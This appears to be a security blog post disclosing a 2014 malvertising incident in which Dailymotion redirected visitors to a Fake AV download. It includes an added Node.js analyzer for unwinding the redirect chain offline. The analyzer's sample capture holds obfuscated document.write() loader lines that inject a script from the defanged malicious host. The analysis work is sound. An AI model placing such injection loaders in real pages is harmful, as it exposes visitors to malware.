Dailymotion.com redirects to Fake AV Threat

Jan 7, 2014


Today we noticed that browsing to hxxp://www[.]dailymotion[.]com yields a Fake A/V threat, as seen in the brief video below. Details of the malware are provided below. At the time of writing, the payload has a detection ratio of 10/47.

As of the time of this post (1:30 EST, 1/7/14) the payload was, to our knowledge, still being served. We have been in contact with the web property and disclosed this information. We will provide updates and further analysis as they become available.

The threat compels the target to download a malicious .exe as a ruse to "clean" their "infected" machine: a traditional Fake A/V attack. Noteworthy is that the web property is ranked around 90th in the world with more than 17m monthly viewers, and that the payload is served through a 3rd-party ad network, similar to what was witnessed a few days ago with Yahoo!

[Screenshot: Dailymotion Fake AV]

The redirect is to hxxp://853e4f39[.]webantivirusprorh[.]pl/ (as seen in the Invincea forensic data captured from running the malware in the virtual container):

[Screenshot: Fake AV forensic data]

A JavaScript-based redirect is loaded, as seen here. You can see the obfuscated script tag on the first line, which is written to the page via document.write():

[Screenshot: Fake AV obfuscated script tag]

The following script then does another document.write() to the .pl site hosting the Fake AV binary, as seen here:

[Screenshot: Fake AV second-stage document.write() to the .pl site]
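The two stages described above (an obfuscated script tag written with document.write(), which loads a script that does a second document.write() pointing at the .pl host) are the pattern an analyst needs to unwind from captured page content. The following is an added example, not code from the original post or from Invincea: a small Node.js analyzer that pulls document.write() arguments out of captured HTML/JS, decodes the common obfuscations (unescape() percent-encoding, String.fromCharCode(), \xNN string escapes and string concatenation), extracts the injected script src URLs, and walks the chain hop by hop. The sample page contents, the landing URL and the intermediary ad host (landing.example, ad-intermediary.example) are constructed for illustration; only the final .pl host is the indicator named in the post, kept in its defanged form.

```javascript
// Added example (not from the original post): reconstruct a document.write()
// redirect chain from captured page content. Handles the obfuscation patterns
// typically seen in malvertising loaders: unescape('%3C...'), String.fromCharCode(...),
// '\x3c'-style escapes, and '+' concatenation of those pieces.

// Return the raw argument text of every document.write( ... ) call in `js`,
// matching parentheses and skipping quoted strings so nested calls survive intact.
function findDocumentWrites(js) {
  const calls = [];
  const needle = 'document.write(';
  let idx = js.indexOf(needle);
  while (idx !== -1) {
    let i = idx + needle.length;
    const start = i;
    let depth = 1;
    let quote = null;
    while (i < js.length && depth > 0) {
      const c = js[i];
      if (quote) {
        if (c === '\\') i++;             // skip the escaped character
        else if (c === quote) quote = null;
      } else if (c === '"' || c === "'") quote = c;
      else if (c === '(') depth++;
      else if (c === ')') depth--;
      i++;
    }
    if (depth === 0) calls.push(js.slice(start, i - 1));
    idx = js.indexOf(needle, i);
  }
  return calls;
}

// Split `s` on `sep` only at top level (outside quotes and parentheses).
function splitTopLevel(s, sep) {
  const parts = [];
  let depth = 0, quote = null, cur = '';
  for (let i = 0; i < s.length; i++) {
    const c = s[i];
    if (quote) {
      cur += c;
      if (c === '\\' && i + 1 < s.length) cur += s[++i];
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'") { quote = c; cur += c; }
    else if (c === '(') { depth++; cur += c; }
    else if (c === ')') { depth--; cur += c; }
    else if (c === sep && depth === 0) { parts.push(cur); cur = ''; }
    else cur += c;
  }
  parts.push(cur);
  return parts.map(p => p.trim());
}

// Decode a quoted JS string literal, resolving \xNN, \uNNNN and simple escapes.
function decodeStringLiteral(lit) {
  return lit.slice(1, -1).replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|\\(.)/g,
    (m, x, u, c) => x ? String.fromCharCode(parseInt(x, 16))
                  : u ? String.fromCharCode(parseInt(u, 16))
                  : c === 'n' ? '\n' : c === 't' ? '\t' : c);
}

// Equivalent of the legacy unescape(): %uXXXX and %XX percent-decoding.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})/g, (m, h) => String.fromCharCode(parseInt(h, 16)))
          .replace(/%([0-9a-fA-F]{2})/g, (m, h) => String.fromCharCode(parseInt(h, 16)));
}

// Evaluate a restricted string expression without running attacker JavaScript:
// only literals, unescape(...), String.fromCharCode(...) and '+' are accepted.
function evalStringExpr(expr) {
  return splitTopLevel(expr.trim(), '+').map(evalTerm).join('');
}

function evalTerm(term) {
  let m;
  if ((m = term.match(/^unescape\s*\(([\s\S]*)\)$/))) return percentDecode(evalStringExpr(m[1]));
  if ((m = term.match(/^String\.fromCharCode\s*\(([\s\S]*)\)$/)))
    return m[1].split(',').map(n => String.fromCharCode(parseInt(n, 10))).join('');
  if (/^(['"])[\s\S]*\1$/.test(term)) return decodeStringLiteral(term);
  throw new Error('unsupported expression (review by hand): ' + term);
}

// Pull src= URLs from any <script> tags in decoded markup.
function extractScriptSources(markup) {
  return [...markup.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi)].map(m => m[1]);
}

// Walk the chain: page -> script written by document.write() -> next script ...
// `fetched` maps URL -> captured body (offline), so nothing is contacted.
function followWriteChain(fetched, startUrl, maxHops = 10) {
  const chain = [startUrl];
  let url = startUrl;
  for (let hop = 0; hop < maxHops; hop++) {
    const body = fetched[url];
    if (body === undefined) break;               // beyond what was captured
    const srcs = findDocumentWrites(body).flatMap(arg => extractScriptSources(evalStringExpr(arg)));
    if (srcs.length === 0) break;
    url = srcs[0];
    chain.push(url);
  }
  return chain;
}

// Constructed sample capture (not real data): landing page with an ad slot,
// an intermediary loader, and the final hop to the host named in the post.
const SAMPLE = {
  'http://landing.example/': `<html><body><div id="ad">
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fad-intermediary.example%2Fa.js%22%3E%3C%2Fscript%3E'));</script>
</div></body></html>`,
  'http://ad-intermediary.example/a.js':
    `document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34) + "http://853e4f39[.]webantivirusprorh[.]pl/" + '\\x22\\x3e\\x3c/script\\x3e');`,
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(followWriteChain(SAMPLE, 'http://landing.example/').join('\n  -> '));
}
```

The point of the restricted evaluator is that the attacker's script is never executed: only the handful of string-building constructs these loaders use are interpreted, and anything else raises an error so the analyst looks at it by hand rather than silently getting an empty result.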

Contents of the index page hosted on 853e4f39[.]webantivirusprorh[.]pl:

[Screenshot: index page of the Fake AV host]

Upon successful installation, the system is rebooted and the victim is presented with the following image showing an active “scan” of their system:

[Screenshot: Fake AV "scan" shown after reboot]
